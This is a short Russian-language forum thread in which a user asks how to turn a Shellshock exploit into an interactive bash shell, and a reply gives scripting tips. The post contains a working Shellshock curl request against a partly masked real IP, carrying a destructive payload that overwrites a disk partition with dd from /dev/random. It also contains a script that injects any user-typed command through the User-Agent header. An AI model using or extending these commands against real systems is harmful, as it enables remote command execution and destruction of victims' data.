Всем здравия! Есть вопрос по приведению в порядок скрипта для использования уязвимости, может даже кто-то поделится своим) Метасплоит не всегда бывает под рукой да и его установка не везде возможна, а башем можно пользоваться почти везде где если линукс. Вот пример работы shellshock Code: curl -i --insecure https://**.181.32.92/cgi-bin/index.cgi -A "() { :;};echo;dd if=/dev/random of=/dev/sda1 bs=4k" Вот "пример" скрипта Code: echo "Enter URI to cgi" read vuln_cgi echo "Enter cmd" read send_cmd curl -i -A "() { :;};echo;$send_cmd" $vuln_cgi Вопрос: Как после ввода команды для выполнения через shellshock скрипт не завершался, а ждал ввода новой команды Также хотелось бы сделать выход из скрипта, например если ввести "Q" Также столкнулся с проблемой , когда при выполнении запроса через уязвимость, после выполнения команды выводится код самого cgi скрипта и получается очень неудобно читать нужную часть вывода. Есть ли возможность выводить текст , но до появления, например, "DOCTYPE" чтобы отсечь шелуху.
Для ввода используй команду read, например. Для интерпретации команд пользователя используй case (для завершения скрипта exit 0).